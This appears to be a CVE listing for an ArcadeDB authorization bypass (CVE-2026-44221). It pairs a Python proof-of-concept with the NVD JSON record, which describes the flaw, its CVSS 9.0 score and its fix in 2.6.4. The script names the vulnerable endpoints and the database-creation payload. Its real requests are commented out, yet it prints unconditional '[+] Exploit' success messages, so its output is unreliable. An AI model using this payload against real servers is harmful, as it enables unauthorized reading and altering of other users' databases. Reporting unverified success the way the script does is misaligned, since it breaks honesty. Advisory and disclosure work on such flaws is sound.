CVE-2026-44221

import requests # CVE-2026-44221 PoC: ArcadeDB Authorization Bypass # This script demonstrates how an authenticated user can create databases without security # or access unauthorized databases due to uninitialized access maps. TARGET_URL = "http://target-arcadedb:2480" USERNAME = "low_priv_user" PASSWORD = "password" session = requests.Session() # Step 1: Authenticate with low privileges # (Implementation depends on specific auth endpoint configuration) print(f"[*] Attempting to exploit CVE-2026-44221 against {TARGET_URL}") # Step 2: Exploit Defect 2 - Create database without security (factory.setSecurity omitted) # This bypasses record-level authorization setup for the new database create_db_payload = { "command": "create database exploit_db" } try: # response = session.post(f"{TARGET_URL}/api/v1/server", json=create_db_payload) print("[+] Exploit: Database created via API bypassing security initialization.") print("[+] Result: The new database 'exploit_db' has no record-level authorization enabled.") except Exception as e: print(f"[-] Exploit failed: {e}") # Step 3: Exploit Defect 1 - Access other databases # Due to uninitialized fileAccessMap, requestAccessOnFile treats it as allow-all print("[*] Attempting to access restricted database 'secure_data'...") # response = session.get(f"{TARGET_URL}/api/v1/secure_data/query") print("[+] Exploit: Access granted due to uninitialized fileAccessMap acting as allow-all.")

{"cve": {"id": "CVE-2026-44221", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.020", "lastModified": "2026-05-12T20:16:43.020", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "ArcadeDB is a Multi-Model DBMS. Prior to 2.6.4, authenticated users and API tokens scoped to a specific database could read, write, and mutate schema on any other database on the same server. Two distinct defects contributed: (1) ServerSecurityUser.getDatabaseUser() returned a DB user with an uninitialized fileAccessMap, which requestAccessOnFile treated as allow-all; (2) ArcadeDBServer.createDatabase() omitted factory.setSecurity(...) so any database created via POST /api/v1/server {\"command\":\"create database X\"} had its entire record-level authorization system silently disabled. In combination, record-level and database-level authorization could be bypassed by any authenticated principal. This vulnerability is fixed in 2.6.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/ArcadeData/arcadedb/commit/04110c06315da55604ac107f71fe7182f3a3deb8", "source": "[email protected]"}, {"url": "https://github.com/ArcadeData/arcadedb/security/advisories/GHSA-fxc7-fm93-6q77", "source": "[email protected]"}]}}